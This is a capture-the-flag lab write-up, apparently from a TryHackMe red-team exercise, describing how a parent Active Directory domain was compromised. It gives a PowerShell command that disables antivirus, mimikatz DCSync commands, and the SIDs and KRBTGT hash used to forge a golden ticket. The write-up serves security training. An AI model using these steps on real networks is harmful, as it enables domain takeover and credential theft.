Full Compromise of Parent Domain
Used Tools
python webserver
powershell
mimikatz
Summary
From our attack machine and VPN server, we will start a web server to provide mimikatz and other tools to the corpdc domain controller used to compromise the parent domain. First, we deactivate the AV, and we unsuccessfully try to retrieve the Administrator hash from the rootdc running lsadump::dcsync with our Domain Admin user in Mimikatz. From there, we gather all the necessary information to craft a golden ticket to impersonate the Administrator and do it so. With the impersonated administrator, we are able to access the directories of rootdc and are able to retrieve the flags for fully compromising the parent domain. The next step is to create a user on rootdc with the tools PsExec and SMBExec, but will be discussed in the next section.
Investigation
Running a python webserver on the attack machine to provide the tools to the network.
Downloading the tools to the VPN machine.
Running a Python webserver on the VPN machine to provide the corpdc with the tools we need.
First, we run a PowerShell as administrator on the corpdc and disable AV with the following command and get Mimikatz from the VPN server.
set-mppreference -disablerealtimemonitoring $true
Next, we run mimikatz, check our privileges and try to dump the hashes of the local administrator of the rootdc. But we’ll get an error, that the username is not unique which is clear, because there are multiple local administrators
lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:Administrator
To get a unique identifier of the local administrator of the rootdc machine, we get the SID of the Administrator from the rootdc to repeat the process of dumping the credentials of the local administrator of the rootdc.
Again we get an error and are not able to retrieve the hash.
lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500
After the many failed attempts we craft a golden ticket to impersonate the administrator to get any further.
For this, the following information has to be gathered to craft a golden ticket.
See also https://tryhackme.com/room/exploitingad Exploiting Domain Trust
The FQDN of the domain
corp.thereserve.loc
The SID of the child domain controller (CORPDC), which we will impersonate in our forged TGT
S-1-5-21-170228521-1485475711-3199862024-1009
Get SID of CORPDC
The SID of the Enterprise Admins in the parent domain, which we will add as an extra SID to our forged TGT
S-1-5-21-1255581842-1300659601-3764024703-519
Get SID of ROOTDC
The username of the account we want to impersonate
Administrator
The KRBTGT password hash
0c757a3445acb94a654554f3ac529ede
With that information, we are able to craft a golden ticket and impersonate the administrator.
From there we are able to reach the directories of rootdc.
And place our proof of compromises in the given folders. The next section includes creating a new user on rootdc and adding this to the Domain Admins and Enterprise Admins, which would be part of this section, but for a clear structure and being part of compromising the BANK domain its discussed there.
Flag-15: Foothold on Parent Domain
Flag-16: Administrative access to Parent Domain
Last updated
